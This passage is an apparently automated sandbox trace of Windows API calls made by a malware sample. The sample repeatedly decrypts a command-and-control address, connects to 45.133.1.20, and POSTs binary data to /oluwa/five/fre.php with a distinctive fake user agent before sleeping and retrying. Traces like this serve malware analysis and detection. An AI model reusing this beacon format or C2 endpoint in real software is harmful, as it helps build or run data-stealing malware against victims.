lpThreadId=0x19ff08*=0x169c) returned 0x924 [0264.673] Sleep (dwMilliseconds=0xea60) [0264.674] GetProcessHeap () returned 0x6a0000 [0264.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0264.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.676] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.683] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0264.697] GetProcessHeap () returned 0x6a0000 [0264.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0264.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.698] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0264.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.699] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.700] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.700] GetProcessHeap () returned 0x6a0000 [0264.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0264.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.730] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0264.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.731] CryptDestroyKey (hKey=0x6ad020) returned 1 [0264.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.732] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0264.732] GetProcessHeap () returned 0x6a0000 [0264.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0264.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.734] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.735] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.736] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.737] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.737] GetProcessHeap () returned 0x6a0000 [0264.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0264.737] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0264.738] GetProcessHeap () returned 0x6a0000 [0264.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0264.738] GetProcessHeap () returned 0x6a0000 [0264.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0264.739] GetProcessHeap () returned 0x6a0000 [0264.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0264.739] GetProcessHeap () returned 0x6a0000 [0264.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0264.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.740] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.747] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0264.755] GetProcessHeap () returned 0x6a0000 [0264.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0264.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.757] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0264.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.758] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.759] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.777] GetProcessHeap () returned 0x6a0000 [0264.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0264.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.779] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0264.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.780] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0264.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.781] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0264.781] GetProcessHeap () returned 0x6a0000 [0264.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0264.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.782] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0264.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.784] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0264.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.785] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0264.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.786] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0264.786] GetProcessHeap () returned 0x6a0000 [0264.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0264.786] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0264.787] GetProcessHeap () returned 0x6a0000 [0264.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0264.787] socket (af=2, type=1, protocol=6) returned 0x928 [0264.789] connect (s=0x928, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0264.887] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0264.887] GetProcessHeap () returned 0x6a0000 [0264.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0264.887] GetProcessHeap () returned 0x6a0000 [0264.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0264.888] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0264.931] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0264.931] GetProcessHeap () returned 0x6a0000 [0264.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba530 [0264.931] GetProcessHeap () returned 0x6a0000 [0264.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0264.932] GetProcessHeap () returned 0x6a0000 [0264.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0264.932] GetProcessHeap () returned 0x6a0000 [0264.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0264.933] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0264.933] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0264.933] GetProcessHeap () returned 0x6a0000 [0264.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0264.933] GetProcessHeap () returned 0x6a0000 [0264.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0264.934] send (s=0x928, buf=0x6bd460*, len=242, flags=0) returned 242 [0264.934] send (s=0x928, buf=0x6bb998*, len=159, flags=0) returned 159 [0264.935] GetProcessHeap () returned 0x6a0000 [0264.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0264.935] recv (in: s=0x928, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0265.026] GetProcessHeap () returned 0x6a0000 [0265.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0265.026] GetProcessHeap () returned 0x6a0000 [0265.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0265.027] GetProcessHeap () returned 0x6a0000 [0265.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba530 | out: hHeap=0x6a0000) returned 1 [0265.027] GetProcessHeap () returned 0x6a0000 [0265.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0265.027] closesocket (s=0x928) returned 0 [0265.028] GetProcessHeap () returned 0x6a0000 [0265.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0265.029] GetProcessHeap () returned 0x6a0000 [0265.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0265.029] GetProcessHeap () returned 0x6a0000 [0265.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0265.029] GetProcessHeap () returned 0x6a0000 [0265.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0265.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16a0) returned 0x928 [0265.043] Sleep (dwMilliseconds=0xea60) [0265.045] GetProcessHeap () returned 0x6a0000 [0265.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0265.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.046] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.055] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0265.217] GetProcessHeap () returned 0x6a0000 [0265.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0265.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.218] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0265.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.220] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.221] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.222] GetProcessHeap () returned 0x6a0000 [0265.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0265.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.223] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0265.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.225] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0265.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.227] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0265.227] GetProcessHeap () returned 0x6a0000 [0265.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0265.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.228] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.231] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.233] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.234] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.234] GetProcessHeap () returned 0x6a0000 [0265.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0265.234] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0265.235] GetProcessHeap () returned 0x6a0000 [0265.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0265.235] GetProcessHeap () returned 0x6a0000 [0265.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0265.235] GetProcessHeap () returned 0x6a0000 [0265.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0265.236] GetProcessHeap () returned 0x6a0000 [0265.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0265.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.245] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0265.255] GetProcessHeap () returned 0x6a0000 [0265.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0265.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.256] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0265.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.258] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.259] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.259] GetProcessHeap () returned 0x6a0000 [0265.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0265.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.261] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0265.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.262] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0265.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.263] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0265.264] GetProcessHeap () returned 0x6a0000 [0265.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0265.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.265] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0265.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.266] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0265.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.268] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0265.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.269] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0265.269] GetProcessHeap () returned 0x6a0000 [0265.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0265.269] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0265.269] GetProcessHeap () returned 0x6a0000 [0265.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0265.269] socket (af=2, type=1, protocol=6) returned 0x92c [0265.270] connect (s=0x92c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0265.296] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0265.296] GetProcessHeap () returned 0x6a0000 [0265.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0265.297] GetProcessHeap () returned 0x6a0000 [0265.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0265.298] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0265.299] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0265.299] GetProcessHeap () returned 0x6a0000 [0265.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba470 [0265.299] GetProcessHeap () returned 0x6a0000 [0265.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0265.299] GetProcessHeap () returned 0x6a0000 [0265.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0265.300] GetProcessHeap () returned 0x6a0000 [0265.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0265.301] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0265.302] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0265.302] GetProcessHeap () returned 0x6a0000 [0265.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0265.302] GetProcessHeap () returned 0x6a0000 [0265.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0265.302] send (s=0x92c, buf=0x6bd460*, len=242, flags=0) returned 242 [0265.303] send (s=0x92c, buf=0x6bb998*, len=159, flags=0) returned 159 [0265.304] GetProcessHeap () returned 0x6a0000 [0265.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0265.304] recv (in: s=0x92c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0265.395] GetProcessHeap () returned 0x6a0000 [0265.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0265.396] GetProcessHeap () returned 0x6a0000 [0265.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0265.396] GetProcessHeap () returned 0x6a0000 [0265.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba470 | out: hHeap=0x6a0000) returned 1 [0265.397] GetProcessHeap () returned 0x6a0000 [0265.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0265.397] closesocket (s=0x92c) returned 0 [0265.398] GetProcessHeap () returned 0x6a0000 [0265.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0265.398] GetProcessHeap () returned 0x6a0000 [0265.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0265.398] GetProcessHeap () returned 0x6a0000 [0265.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0265.399] GetProcessHeap () returned 0x6a0000 [0265.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0265.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16a4) returned 0x92c [0265.411] Sleep (dwMilliseconds=0xea60) [0265.418] GetProcessHeap () returned 0x6a0000 [0265.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0265.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.420] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.434] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0265.445] GetProcessHeap () returned 0x6a0000 [0265.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0265.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 